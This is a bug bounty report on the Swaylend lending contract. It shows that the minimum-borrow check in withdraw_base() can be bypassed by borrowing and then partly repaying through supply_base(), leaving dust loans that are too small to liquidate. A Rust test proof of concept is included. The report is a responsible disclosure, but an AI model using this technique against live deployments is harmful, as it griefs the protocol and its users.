Active Boosts

#35831 [SC-High] By bypassing base_borrow_min limitation borrows can create inabsorbable loans

Submitted on Oct 10th 2024 at 08:54:13 UTC by @SeveritySquad for IOP | Swaylend

  • Report ID: #35831

  • Report Type: Smart Contract

  • Report severity: High

  • Target: https://github.com/Swaylend/swaylend-monorepo/blob/develop/contracts/market/src/main.sw

  • Impacts:

    • Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol)

    • Contract fails to deliver promised returns, but doesn't lose value

Description

Brief/Intro

The `withdraw_base()` contains a condition to prevent creation of loans smaller than `base_borrow_min` amount. This limitation can be bypassed, by creating a larger loan (higher than `base_borrow_min` amount) and repaying some portion of it so that the remaining part is lower than `base_borrow_min`.

Vulnerability Details

The `withdraw_base()` method contains the following condition: ``` require( u256::try_from(user_balance.wrapping_neg()) .unwrap() >= storage .market_configuration .read() .base_borrow_min, Error::BorrowTooSmall, ); ``` While it prevents a borrow for taking a too small loan, this check is not present in the `supply_base()`. As a result a user can take a larger loan and then repay immediately back some smaller portion so that the balance will eventually be lower than `base_borrow_min`.

Impact Details

The impact of this issue is that if those position are small enough they may not be worth to cover the gas cost of calling the `absorb()` for those accounts. Hence the collateral will be stuck in the contract as there would be no financial incentive to take out such a small amount. While those amounts are small they can amass over time on multiple accounts, hence the chosen severity is Medium as it falls into griefing category.

References

condition in the `withdraw_base()`: https://github.com/Swaylend/swaylend-monorepo/blob/bbfa0b0840311d0eb0519d2b4fed8bf9d06868cd/contracts/market/src/main.sw#L625

Proof of Concept

Proof of Concept

The PoC presents creation of a debt position of size `1`: ``` #[tokio::test] async fn poc_create_small_loan() { let TestData { wallets, alice, alice_account, bob, bob_account, chad, market, assets, usdc, eth, oracle, price_feed_ids, publish_time, prices, usdc_contract, .. } = setup().await;

let price_data_update = PriceDataUpdate {
    update_fee: 0,
    price_feed_ids,
    publish_times: vec![publish_time; assets.len()],
    update_data: oracle.create_update_data(&prices).await.unwrap(),
};

// =================================================
// ==================== Step #0 ====================
// 👛 Wallet: Alice 🧛
// 🤙 Call: supply_base
// 💰 Amount: 3000.00 USDC
let alice_supply_amount = parse_units(3000 * AMOUNT_COEFFICIENT, usdc.decimals);
let alice_mint_amount = parse_units(4000 * AMOUNT_COEFFICIENT, usdc.decimals);
let alice_supply_log_amount = format!("{} USDC", alice_supply_amount as f64 / SCALE_6);
print_case_title(0, "Alice", "supply_base", alice_supply_log_amount.as_str());
println!("💸 Alice + {alice_supply_log_amount}");
usdc_contract
    .mint(alice_account, alice_mint_amount)
    .await
    .unwrap();
let balance = alice.get_asset_balance(&usdc.asset_id).await.unwrap();
assert!(balance == alice_mint_amount);

let alice_supply_res = market
    .with_account(&alice)
    .await
    .unwrap()
    .supply_base(usdc.asset_id, alice_supply_amount)
    .await;
assert!(alice_supply_res.is_ok());

market.debug_increment_timestamp().await.unwrap();
// =================================================
// ==================== Step #1 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: supply_collateral
// 💰 Amount: 1.00 ETH
let bob_supply_amount = parse_units(1 * AMOUNT_COEFFICIENT, eth.decimals);
let bob_supply_res = market
    .with_account(&bob)
    .await
    .unwrap()
    .supply_collateral(eth.asset_id, bob_supply_amount)
    .await;
assert!(bob_supply_res.is_ok());

let bob_user_collateral = market
    .get_user_collateral(bob_account, eth.asset_id)
    .await
    .unwrap()
    .value;
assert!(bob_user_collateral == bob_supply_amount);

market
    .print_debug_state(&wallets, &usdc, &eth)
    .await
    .unwrap();

market.debug_increment_timestamp().await.unwrap();

// =================================================
// ==================== Step #2 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: withdraw_base
// 💰 Amount: <MAX HE CAN BORROW>
let max_borrow_amount = market
    .available_to_borrow(&[&oracle.instance], bob_account)
    .await
    .unwrap();
let log_amount = format!("{} USDC", max_borrow_amount as f64 / SCALE_6);
print_case_title(2, "Bob", "withdraw_base", &log_amount.as_str());
let bob_borrow_res = market
    .with_account(&bob)
    .await
    .unwrap()
    .withdraw_base(
        &[&oracle.instance],
        max_borrow_amount.try_into().unwrap(),
        &price_data_update,
    )
    .await;
assert!(bob_borrow_res.is_ok());

let balance = bob.get_asset_balance(&usdc.asset_id).await.unwrap();
assert!(balance == max_borrow_amount as u64);
market
    .print_debug_state(&wallets, &usdc, &eth)
    .await
    .unwrap();

// =================================================
// ==================== Step #3 ====================
// 👛 Wallet: Bob 🧛
// 🤙 Call: withdraw_base 
// 💰 Amount: <max he can borrow - 1>

//let tx_policies = TxPolicies::default().with_script_gas_limit(1_000_000);

// Withdraw base
    // Supply base
let supply_base_call = market
    .with_account(&bob)
    .await
    .unwrap()
    .supply_base(usdc.asset_id, max_borrow_amount as u64 - 1)
    .await;

// Check borrow amount of bob
let (_, borrow) = market.get_user_supply_borrow(bob_account).await.unwrap();

println!("Bob's borrow amount: {} ", borrow);

} ```

Previous#35768 [SC-Insight] `Market.set_pyth_contract_id` should emit an eventNext#35684 [SC-Critical] Incorrect Pyth Oracle Price Feed Process Leads to Wrong Collateral Value Calculation